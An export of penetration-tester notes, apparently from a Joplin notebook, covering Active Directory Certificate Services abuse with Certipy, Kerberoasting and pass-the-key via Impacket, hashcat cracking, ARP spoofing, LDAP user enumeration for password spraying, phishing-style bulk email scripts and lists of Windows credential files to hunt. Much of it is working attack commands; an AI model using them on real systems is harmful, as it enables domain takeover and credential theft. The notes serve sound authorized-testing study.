- certipy-ad account update -username afsimmons@megacorpone.com -p Spawn123! -user 

## Scenario 2:

- certipy-ad shadow auto -username afsimmons@megacorpone.com -p Spawn123! -account xadmin
- certipy-ad account update -username afsimmons@megacorpone.com -p Spawn123! -user xadmin -upn Administrator
- certipy-ad req -username xadmin@megacorpone.com -hash "NT-HASH" -CA 'corp-DC-CA' -template 'Vuln Template'
- certipy-ad account update -username afsimmons@megacorpone.com -p Spawn123! -user xadmin -upn xadmin@megacorpone.com
- certipy-ad auth -pfx dc.pfx -dc-ip 172.21.1.5 -ldap-shell

id: 4edf2d31447840a9a9a97ca9dfb82926
parent_id: e5db134a7ed6458393dd8757b82ddab1
created_time: 2024-08-31T19:05:32.553Z
updated_time: 2024-09-03T04:26:53.268Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132213
user_created_time: 2024-08-31T19:05:32.553Z
user_updated_time: 2024-09-03T04:26:53.268Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1520eda742e5d41e886b8b741602831e3.md000644 0000002021 14666154175012377 0ustar00000000 000000 General Notes Windows

View your current user: 

- whoami

View information about the current user: 

- net user afsimmons

- net user afsimmons /domain (For a domain user)

View Local Groups: 

- net localgroup
- net localgroup Administrators

Add a new user: 

- net user afsimmons enterpasswordhere /add

Add a user in a localgroup:

- net localgroup Administrators afsimmons




id: 520eda742e5d41e886b8b741602831e3
parent_id: 3d952c01f8714d48887a2785a84c3fbb
created_time: 2024-08-01T20:20:33.160Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132789
user_created_time: 2024-08-01T20:20:33.160Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 152f66871b34d45fd9381134f08d8eee4.md000644 0000000604 14666154175012507 0ustar00000000 000000 Reporting

id: 52f66871b34d45fd9381134f08d8eee4
created_time: 2024-09-04T21:42:12.950Z
updated_time: 2024-09-04T21:58:53.562Z
user_created_time: 2024-09-04T21:42:12.950Z
user_updated_time: 2024-09-04T21:58:53.562Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 3b564ef55d0146539fe7746097d9d39c
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 2533f89ee69a545b7a416b814f14e5d3d.md000644 0000000617 14666154175012566 0ustar00000000 000000 7. Post Exploitation

id: 533f89ee69a545b7a416b814f14e5d3d
created_time: 2024-09-04T21:42:12.512Z
updated_time: 2024-09-04T21:42:41.474Z
user_created_time: 2024-09-04T21:42:12.512Z
user_updated_time: 2024-09-04T21:42:41.474Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 209cdc03c015406883ec99e460d27e45
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 253f9faf80a2747c88158a55ac20de43a.md000644 0000014652 14666154175012640 0ustar00000000 000000 Sending Emails from Kali Linux Console

# Sendemail

```
sendEmail -t to@domain.com -f from@megacorpone.com -s <ip smtp> -u "Important subject" -a /tmp/malware-letter.pdf
Reading message body from STDIN because the '-m' option was not used.

If you are manually typing in a message:
  - First line must be received within 60 seconds.
  - End manual input with a CTRL-D on its own line.

Try Harder!
```

# Scripts to send an email

## Python

send_email.py
```
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import argparse
import getpass

def send_email(subject, body, to_email, from_email, from_password):
    # SMTP server configuration
    smtp_server = "smtp.gmail.com"
    smtp_port = 587

    # Create the email message
    msg = MIMEMultipart()
    msg['From'] = from_email
    msg['To'] = to_email
    msg['Subject'] = subject

    # Attach the email body to the message
    msg.attach(MIMEText(body, 'plain'))

    try:
        # Connect to the SMTP server
        server = smtplib.SMTP(smtp_server, smtp_port)
        server.starttls()  # Upgrade the connection to a secure encrypted SSL/TTLS connection
        server.login(from_email, from_password)

        # Send the email
        server.sendmail(from_email, to_email, msg.as_string())
        print(f"Email sent successfully to {to_email}")

    except Exception as e:
        print(f"Failed to send email to {to_email}: {e}")

    finally:
        server.quit()

def read_email_list(file_path):
    with open(file_path, 'r') as file:
        email_list = [line.strip() for line in file if line.strip()]
    return email_list

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Send an email from the command line.')
    parser.add_argument('subject', help='The subject of the email')
    parser.add_argument('body', help='The body of the email')
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument('--to_email', help='The recipient email address')
    group.add_argument('--email_list', help='Path to a file containing a list of recipient email addresses')
    parser.add_argument('--from_email', help='The sender email address')
    parser.add_argument('--from_password', help='The sender email password')
    args = parser.parse_args()

    if not args.from_email:
        args.from_email = input("Enter your email: ")
    if not args.from_password:
        args.from_password = getpass.getpass("Enter your password: ")

    if args.to_email:
        send_email(args.subject, args.body, args.to_email, args.from_email, args.from_password)
    elif args.email_list:
        email_list = read_email_list(args.email_list)
        for email in email_list:
            send_email(args.subject, args.body, email, args.from_email, args.from_password)
```

Command Options: 

1. Send an email to a single recipient: 

- python send_email.py "Test Subject" "This is the body of the email" --to_email recipient@example.com --from_email your-email@gmail.com --from_password your-password

2. Send the email to multiple recipients from a list: 

- python send_email.py "Test Subject" "This is the body of the email" --email_list email-list.txt --from_email your-email@gmail.com --from_password your-password

## Golang

send-email.go
```
package main

import (
	"bufio"
	"bytes"
	"flag"
	"fmt"
	"log"
	"net/smtp"
	"os"
	"strings"
)

func sendEmail(smtpHost string, smtpPort string, from string, password string, to []string, subject string, body string) error {
	auth := smtp.PlainAuth("", from, password, smtpHost)

	msg := bytes.Buffer{}
	msg.WriteString("From: " + from + "\n")
	msg.WriteString("To: " + strings.Join(to, ",") + "\n")
	msg.WriteString("Subject: " + subject + "\n\n")
	msg.WriteString(body)

	return smtp.SendMail(smtpHost+":"+smtpPort, auth, from, to, msg.Bytes())
}

func readEmailList(filePath string) ([]string, error) {
	file, err := os.Open(filePath)
	if err != nil {
		return nil, err
	}
	defer file.Close()

	var emailList []string
	scanner := bufio.NewScanner(file)
	for scanner.Scan() {
		email := strings.TrimSpace(scanner.Text())
		if email != "" {
			emailList = append(emailList, email)
		}
	}

	if err := scanner.Err(); err != nil {
		return nil, err
	}

	return emailList, nil
}

func main() {
	smtpHost := flag.String("smtpHost", "smtp.gmail.com", "SMTP server host")
	smtpPort := flag.String("smtpPort", "587", "SMTP server port")
	from := flag.String("from", "", "Sender email address")
	password := flag.String("password", "", "Sender email password")
	to := flag.String("to", "", "Recipient email address")
	subject := flag.String("subject", "Test Subject", "Email subject")
	body := flag.String("body", "This is the body of the email", "Email body")
	emailListPath := flag.String("emailList", "", "Path to a file containing a list of recipient email addresses")

	flag.Parse()

	if *from == "" || *password == "" || (*to == "" && *emailListPath == "") {
		flag.Usage()
		os.Exit(1)
	}

	var toEmails []string
	if *to != "" {
		toEmails = []string{*to}
	}
	if *emailListPath != "" {
		emails, err := readEmailList(*emailListPath)
		if err != nil {
			log.Fatalf("Failed to read email list: %v", err)
		}
		toEmails = append(toEmails, emails...)
	}

	err := sendEmail(*smtpHost, *smtpPort, *from, *password, toEmails, *subject, *body)
	if err != nil {
		log.Fatalf("Failed to send email: %v", err)
	}

	fmt.Println("Email sent successfully")
}

```

Compile the script: 

```
go build -o send-email send-email.go
```

Executing the script:

Single Recipient:
```
./send-email -from your-email@gmail.com -password your-password -to recipient@example.com -subject "Test Subject" -body "This is the body of the email"
```

Multiple Recipients: 

```
./send-email -from your-email@gmail.com -password your-password -emailList email_list.txt -subject "Test Subject" -body "This is the body of the email"
```

id: 53f9faf80a2747c88158a55ac20de43a
parent_id: 9537b357671141d2ab622763d0de16cf
created_time: 2024-08-07T17:04:32.397Z
updated_time: 2024-08-07T17:37:38.596Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132318
user_created_time: 2024-08-07T17:04:32.397Z
user_updated_time: 2024-08-07T17:37:38.596Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 156a9134dd7bb4e8db0e71b5e91456456.md000644 0000013007 14666154175012555 0ustar00000000 000000 Network Discovery Scans

# NetDiscover (ARP Scanning):
- netdiscover -i eth0
- netdiscover -r 172.21.10.0/24

# Dsniff Arpspoof

First enable Linux box to act as a router:

`echo 1 > /proc/sys/net/ipv4/ip_forward`

Then run `arpspoof`:

`arpspoof -i <interface> -t <target> -r <host>`

For example, to intercept traffic between targets, use:

`arpspoof -i eth0 -t 192.168.4.11 -r 192.168.4.16`

# Nmap:

- nmap -sn 172.21.10.0/24
- nmap -sn 172.21.10.1-253
- nmap -sn 172.21.10.*

You can also grep out the IP addresses and cut out fluff:
```
nmap -sn 172.x.x.x/24 | grep "172" | cut -f 5 -d ' '
```

A slower, more stealthier approach that utilizes the files containing the IP address split (as seen in the first section above) would be:
```
nmap --randomize-hosts -sn -T2 -oN nmap_discoveryScan_x.x.x.x-16.txt -iL x.x.x.x_IP_range.split.txt
```
This will export the results into a text file (`-oN`). Randomized hosts is optional, depending on the customer and the testing situation. The flag, `-oA`, can be used in place of `-oX` or `-oN`, as `-oA` will output the results to all output formats. 

The results for both command options shown above will be the list of hosts that responded to the ping, thus are up and alive.

# Nbtscan: 
- nbtscan -r 172.21.1.0/24

# Masscan
- masscan 172.21.10.0/24 --ping

# Ping Sweeps

## Linux Ping Sweep (Bash)

- for i in {1..254} ;do (ping -c 1 172.21.10.$i | grep "bytes from" &) ;done

## Windows Ping Sweep (Run on Windows System)

- for /L %i in (1,1,255) do @ping -n 1 -w 200 172.21.10.%i > nul && echo 172.21.1.%i is up.

## Powershell Ping Sweep: 
Note: This command can also run on powershell for Linux

- 1..20 | % {"172.21.10.$($_): $(Test-Connection -count 1 -comp 172.21.10.$($_) -quiet)"}
- Get-PingSweep Subnet 172.21.10
```
# Reference: https://gist.github.com/joegasper/93ff8ae44fa8712747d85aa92c2b4c78
function ResolveIp($IpAddress) {
    try {
        (Resolve-DnsName $IpAddress -QuickTimeout -ErrorAction SilentlyContinue).NameHost
    } catch {
        $null
    }
}

function Invoke-PingSweep {
    [CmdletBinding()]
    Param(
        [Parameter(Mandatory=$true)]
        [string]$SubNet,
        [switch]$ResolveName
    )
    $ips = 1..254 | ForEach-Object {"$($SubNet).$_"}
    $ps = foreach ($ip in $ips) {
        (New-Object Net.NetworkInformation.Ping).SendPingAsync($ip, 250)
        #[Net.NetworkInformation.Ping]::New().SendPingAsync($ip, 250) # or if on PowerShell v5
    }
    [Threading.Tasks.Task]::WaitAll($ps)
    $ps.Result | Where-Object -FilterScript {$_.Status -eq 'Success' -and $_.Address -like "$subnet*"} 
    Select-Object Address,Status,RoundtripTime -Unique |
    ForEach-Object {
        if ($_.Status -eq 'Success') {
            if (!$ResolveName) {
                $_
            } else {
                $_ | Select-Object Address, @{Expression={ResolveIp($_.Address)};Label='Name'}, Status, RoundtripTime
            }
        }
    }
}
```

## Python Ping Sweep:

The following python script can be used to perform a ping scan. 
```
#!/usr/bin/env python3
import ipaddress
from subprocess import Popen, DEVNULL

for ping in range(1, 254):
        address = "x.x.x.%d" % ping
        response = Popen(["ping", "-c1", address], stdout=DEVNULL)
        output = response.communicate()[0]
        val1 = response.returncode
        if val1 == 0:
                print(address)
```
This script is specifically used for a /24 network. Modification required for other network types. 

# 802.lQ Cisco Dynamic Trunking Protocol (DTP) 

## Dtpscan

Source: https://github.com/commonexploits/dtpscan

DTPscan will passively sniff the network and detect which switchport mode the switch is configured in to assist with VLAN hopping attacks.**

`./dtpscan.sh`

## Yersinia

In Kali: sudo apt install yersinia

Running yersinia: 

```
$ sudo yersinia -h

Usage: yersinia [-hVGIDd] [-l logfile] [-c conffile] protocol [protocol_options]
       -V   Program version.
       -h   This help screen.
       -G   Graphical mode (GTK).
       -I   Interactive mode (ncurses).
       -D   Daemon mode.
       -d   Debug.
       -l logfile   Select logfile.
       -c conffile  Select config file.
  protocol   One of the following: cdp, dhcp, dot1q, dot1x, dtp, hsrp, isl, mpls, stp, vtp.

Try 'yersinia protocol -h' to see protocol_options help

Please, see the man page for a full list of options and many examples.
Send your bugs & suggestions to the Yersinia developers <yersinia@yersinia.net>

MOTD: M4t30 31337 M4t30 31337 M4t30 31337 M4t30 31337 M4t30 31337

```

Once a VLAN has been identified, a virtual interface can be configured within Kali Linux:

```
modprobe 8021q
vconfig add <interface> <vlan_number>
dhclient <interface>.<vlan_number>
```

Verifying our 
To check this is configured correctly the `ifconfig <interface>.<vlan_number>` or `ip a` commands can be ran.

Reference: https://www.blackhat.com/presentations/bh-europe-05/BH_EU_05-Berrueta_Andres/BH_EU_05_Berrueta_Andres.pdf

id: 56a9134dd7bb4e8db0e71b5e91456456
parent_id: 204bf6446e68480f8aa4bc2e58bca732
created_time: 2024-08-01T20:20:33.152Z
updated_time: 2024-08-12T15:44:37.360Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132013
user_created_time: 2024-08-01T20:20:33.152Z
user_updated_time: 2024-08-12T15:44:37.360Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 156e397e4666449a98bc5be66f86e7a67.md000644 0000000627 14666154175012545 0ustar00000000 000000 8. Post Exploitation Targets

id: 56e397e4666449a98bc5be66f86e7a67
created_time: 2024-09-04T21:42:12.801Z
updated_time: 2024-09-04T21:57:46.497Z
user_created_time: 2024-09-04T21:42:12.801Z
user_updated_time: 2024-09-04T21:57:46.497Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 209cdc03c015406883ec99e460d27e45
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 25795ae40eaeb45eab3e22086d3440b18.md000644 0000006077 14666154175012624 0ustar00000000 000000 LDAP Enumeration (Port 389 and 636)

# LDAP Enumeration Tools

**Note:** Be careful with brute forcing AD as you can disable user accounts due to the Account Lockout Policy. 

### ldapsearch

Simple authentication check:
```
$ ldapsearch -h <target_IP> -x
```
Anonymous Credential LDAP Dumping: 
```
$ ldapsearch -LLL -x -H ldap://<domain fqdn> -b ‘’ -s base ‘(objectclass=*)’
```
Getting DN:
```
$ ldapsearch -h <target_IP> -x -s base namingcontexts
```
- `-s` is scope: one of base, one, sub or children (search scope)

If you get DN from above command, use it in a base search (-b basedn: base dn for search)
```
$ ldapsearch -h <target_IP> -x -b "DC=<blah>,DC=<blah>"
```
You can also query the LDAP server:
```
$ ldapsearch -h <target_IP> -x -b "DC=<blah>,DC=<blah>" <query>
```
i.e. user enumeration:
```
$ ldapsearch -h <target_IP> -x -b "DC=<blah>,DC=<blah>" '(objectClass=Person)'
```
This will give a lot of useful information, i.e. when password was last reset, username of the account (sAMAccountName).

Filtering your query:
```
$ ldapsearch -h <target_IP> -x -b "DC=<blah>,DC=<blah>" '(objectClass=Person)' <filters>
```
I.e. to query for only account names:
```
$ ldapsearch -h <target_IP> -x -b "DC=<blah>,DC=<blah>" '(objectClass=Person)' sAMAccountName
```
Or use grep to get a list of account names for password spraying:
```
$ ldapsearch -h <target_IP> -x -b "DC=<blah>,DC=<blah>" '(objectClass=Person)' sAMAccountName | grep sAMAccountName | awk '{print $2}' > userlist.ldap
```

### Impacket

Using that username list generated from `ldapsearch`, we can use Impacket's `GetNPUsers.py` to see if we can get a user's TGT:
```
$ python3 GetNPUsers.py -dc-ip <target_IP> -request domain.local/ -userfile userlist.ldap -format john
```
or
```
$ GetADUsers.py -all <domain\User> -dc-ip <DC_IP>
```

You can simply change the -format flag to hashcat if you want to use hashcat. 

Or try with no password:
```
$ python3 GetNPUsers.py <domain/user> -request -no-pass -dc-ip <IP>
```

Impacket `lookupsid.py`:
```
$ /usr/share/doc/python3-impacket/examples/lookupsid.py username:password@x.x.x.x
```

### Windapsearch

Source: https://github.com/ropnop/windapsearch 
```
$ python3 windapsearch.py -d host.domain -u domain\\ldapbind -p PASSWORD -U
```

#### References: 

- [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#most-common-paths-to-ad-compromise)

id: 5795ae40eaeb45eab3e22086d3440b18
parent_id: ad6cb7f4e9f741f8ab75090810708ae1
created_time: 2024-08-01T20:20:33.156Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132405
user_created_time: 2024-08-01T20:20:33.156Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 15abb8619041a4e3a9db073dd97403fa1.md000644 0000000623 14666154175012612 0ustar00000000 000000 3. Active Directory (AD)

id: 5abb8619041a4e3a9db073dd97403fa1
created_time: 2024-09-04T21:42:12.183Z
updated_time: 2024-09-04T21:43:07.447Z
user_created_time: 2024-09-04T21:42:12.183Z
user_updated_time: 2024-09-04T21:43:07.447Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 9e044fa952a4470d882affd94d07030a
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 25bd1967a3a514e1197ac684a62a8567f.md000644 0000000621 14666154175012473 0ustar00000000 000000 4. Enumerating Targets

id: 5bd1967a3a514e1197ac684a62a8567f
created_time: 2024-09-04T21:42:12.415Z
updated_time: 2024-09-04T21:42:51.137Z
user_created_time: 2024-09-04T21:42:12.415Z
user_updated_time: 2024-09-04T21:42:51.137Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 209cdc03c015406883ec99e460d27e45
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 25d5883588bb347e790e78733ca62cc4c.md000644 0000000636 14666154175012520 0ustar00000000 000000 7. Network Shares (SMB, SAMBA, NFS)

id: 5d5883588bb347e790e78733ca62cc4c
created_time: 2024-09-04T21:42:12.374Z
updated_time: 2024-09-04T21:42:12.374Z
user_created_time: 2024-09-04T21:42:12.374Z
user_updated_time: 2024-09-04T21:42:12.374Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 9e044fa952a4470d882affd94d07030a
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 25dde18f02d5246f282ea33122ad4b519.md000644 0000003320 14666154175012527 0ustar00000000 000000 Hashcat


## BENCHMARK TEST (HASH TYPE)

- hashcat -b -m #type

## SHOW EXAMPLE HASH

- hashcat -m #type --example-hashes

## DICTIONARY ATTACK

- hashcat -a 0 -m #type hash.txt dict.txt

DICTIONARY + RULES ATTACK

- hashcat -a 0 -m #type hash.txt dict.txt -r rule.txt

COMBINATION ATTACK

- hashcat -a 1 -m #type hash.txt dict1.txt dict2.txt

## MASK ATTACK

- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a?a

HYBRID DICTIONARY + MASK

- hashcat -a 6 -m #type hash.txt dict.txt ?a?a?a?a

HYBRID MASK + DICTIONARY

- hashcat -a 7 -m #type hash.txt ?a?a?a?a dict.txt


## INCREMENT

DEFAULT INCREMENT

- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a --increment

INCREMENT MINIMUM LENGTH

- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a --increment-min=4

INCREMENT MAX LENGTH

- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a?a --increment-max=5

SESSION RESTORE

- hashcat -a 0 -m #type --restore --session <uniq_name> hash.txt dict.txt


## Cracking krb5ts Keys

- hashcat -m 13100 --force <TGSs_file> <passwords_file>

## Cracking Asrep keys

- hashcat -a 0 -m 18200 <asrep_file> <password_file> 



id: 5dde18f02d5246f282ea33122ad4b519
parent_id: f5b6f52827df4dfd8523222cd85dcaa6
created_time: 2024-08-01T20:20:33.160Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132854
user_created_time: 2024-08-01T20:20:33.160Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 15f61396aff534f70804351e1db59cc7b.md000644 0000000614 14666154175012555 0ustar00000000 000000 Proof-Screenshots

id: 5f61396aff534f70804351e1db59cc7b
created_time: 2024-09-04T21:42:12.935Z
updated_time: 2024-09-04T21:42:12.935Z
user_created_time: 2024-09-04T21:42:12.935Z
user_updated_time: 2024-09-04T21:42:12.935Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 3b564ef55d0146539fe7746097d9d39c
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 26012ecf55228499c8f9272feb0535894.md000644 0000003451 14666154175012356 0ustar00000000 000000 Impacket Kerberoasting

## Check for Kerberoasting: 

- GetNPUsers.py DOMAIN-Target/ -usersfile user.txt -dc-ip <IP> -format hashcat/john

## GetUserSPNs

ASREPRoast:
- impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
- impacket-GetUserSPNs <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

Kerberoasting: 
- impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file> 

Overpass The Hash/Pass The Key (PTK):

- python3 getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
- python3 getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
- python3 getTGT.py <domain_name>/<user_name>:[password]

## Using TGT key to excute remote commands from the following impacket scripts:

- python3 psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
- python3 smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
- python3 wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass



id: 6012ecf55228499c8f9272feb0535894
parent_id: ab4c6b72385d4d8db33ad00069267585
created_time: 2024-08-01T20:20:33.152Z
updated_time: 2024-09-04T04:35:31.607Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132120
user_created_time: 2024-08-01T20:20:33.152Z
user_updated_time: 2024-09-04T04:35:31.607Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1619af8e215954911a6f5d28fea1daf93.md000644 0000001412 14666154175012637 0ustar00000000 000000 Target

# This is a placeholder to contain all notes regarding the post-exploitation phase for each target you assess.

id: 619af8e215954911a6f5d28fea1daf93
parent_id: 56e397e4666449a98bc5be66f86e7a67
created_time: 2024-08-01T20:20:33.160Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132811
user_created_time: 2024-08-01T20:20:33.160Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 1683f633e9ae24821b9411611851581bd.md000644 0000000616 14666154175012252 0ustar00000000 000000 6. Web (HTTP_HTTPS)

id: 683f633e9ae24821b9411611851581bd
created_time: 2024-09-04T21:42:12.343Z
updated_time: 2024-09-04T21:42:12.343Z
user_created_time: 2024-09-04T21:42:12.343Z
user_updated_time: 2024-09-04T21:42:12.343Z
encryption_cipher_text: 
encryption_applied: 0
parent_id: 9e044fa952a4470d882affd94d07030a
is_shared: 0
share_id: 
master_key_id: 
icon: 
user_data: 
deleted_time: 0
type_: 26a31c2ac98834bafb6df304273792fad.md000644 0000002460 14666154175012705 0ustar00000000 000000 Tips for Writing a Report

1. Understand who is going to be reading this and who is the target audience?
2. The report needs to clear that a non-technical person would understand 
3. Report should include the following: 
	1. Executive Summary
	2. Technical Summary
	3. Detail Report of findings
	4. Include references from MITRE ATT&CK (https://attack.mitre.org/)
	5. Recommendations for remediation (If possible)
	

Public Pentesting Reports: 

- https://github.com/juliocesarfort/public-pentesting-reports
- https://www.hackthebox.com/storage/press/samplereport/sample-penetration-testing-report-template.pdf
- https://www.offsec.com/pwk-online/OSCP-Exam-Report.docx

id: 6a31c2ac98834bafb6df304273792fad
parent_id: 52f66871b34d45fd9381134f08d8eee4
created_time: 2024-08-01T20:20:33.160Z
updated_time: 2024-08-07T17:38:31.764Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132981
user_created_time: 2024-08-01T20:20:33.160Z
user_updated_time: 2024-08-07T17:38:31.764Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 16b5a4e4741fd4fa396dde6408796d45e.md000644 0000004541 14666154175012655 0ustar00000000 000000 General Notes Windows

# Sensitive Files to look for: 

## Windows: 

```
%windir%\repair\sam
%windir%\System32\config\RegBack\SAM
%windir%\repair\system
%windir%\repair\software
%windir%\repair\security
%windir%\debug\NetSetup.log (AD domain name, DC name, internal IP, DA account)
%windir%\iis6.log (5,6 or 7)
%windir%\system32\logfiles\httperr\httperr1.log
C:\sysprep.inf
C:\sysprep\sysprep.inf
C:\sysprep\sysprep.xml
%windir%\Panther\Unattended.xml
C:\inetpub\wwwroot\Web.config
%windir%\system32\config\AppEvent.Evt (Application log)
%windir%\system32\config\SecEvent.Evt (Security log)
%windir%\system32\config\default.sav
%windir%\system32\config\security.sav
%windir%\system32\config\software.sav
%windir%\system32\config\system.sav
%windir%\system32\inetsrv\config\applicationHost.config
%windir%\system32\inetsrv\config\schema\ASPNET_schema.xml
%windir%\System32\drivers\etc\hosts (dns entries)
%windir%\System32\drivers\etc\networks (network settings)
%windir%\system32\config\SAM (only really useful if you have access to the files while the machine is off)
%windir%\unattend.xml
%windir%\Windows\Panther\Unattend.xml
%windir%\Windows\Panther\Unattend\Unattend.xml
%windir%\Windows\system32\sysprep.inf
%windir%\Windows\system32\sysprep\sysprep.xml
C:\ProgramData\Configs\*
C:\Program Files\Windows PowerShell\*
dir c:*vnc.ini /s /b
dir c:*ultravnc.ini /s /b
```

## Search for contents contained in a file:

```
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*
```

## Search for a file with a certain filename:

```
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini
```






id: 6b5a4e4741fd4fa396dde6408796d45e
parent_id: 7b7c6aedc09c4765877ef430c7c267db
created_time: 2024-08-01T20:20:33.156Z
updated_time: 2024-07-31T21:08:01.794Z
is_conflict: 0
latitude: 0.00000000
longitude: 0.00000000
altitude: 0.0000
author: 
source_url: 
is_todo: 0
todo_due: 0
todo_completed: 0
source: joplin-desktop
source_application: net.cozic.joplin-desktop
application_data: 
order: 1725486132561
user_created_time: 2024-08-01T20:20:33.156Z
user_updated_time: 2024-07-31T21:08:01.794Z
encryption_cipher_text: 
encryption_applied: 0
markup_language: 1
is_shared: 0
share_id: 
conflict_original_id: 
master_key_id: 
user_data: 
deleted_time: 0
type_: 16d908deedb07498dbad8aa648e5f4ef3.md000644 0000004040 14666154175013146 0ustar00000000 000000 General Notes Windows

# PowerShell

```
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table –AutoSize
```

## Obtaining a list of programs from a remote system:

- ```Invoke-command -computer remote_pc_name {Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -AutoSize }```

## Here is a script that will pull a list of software that is installed on the users system:

```
$listsoftware= Get-ChildItem HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall

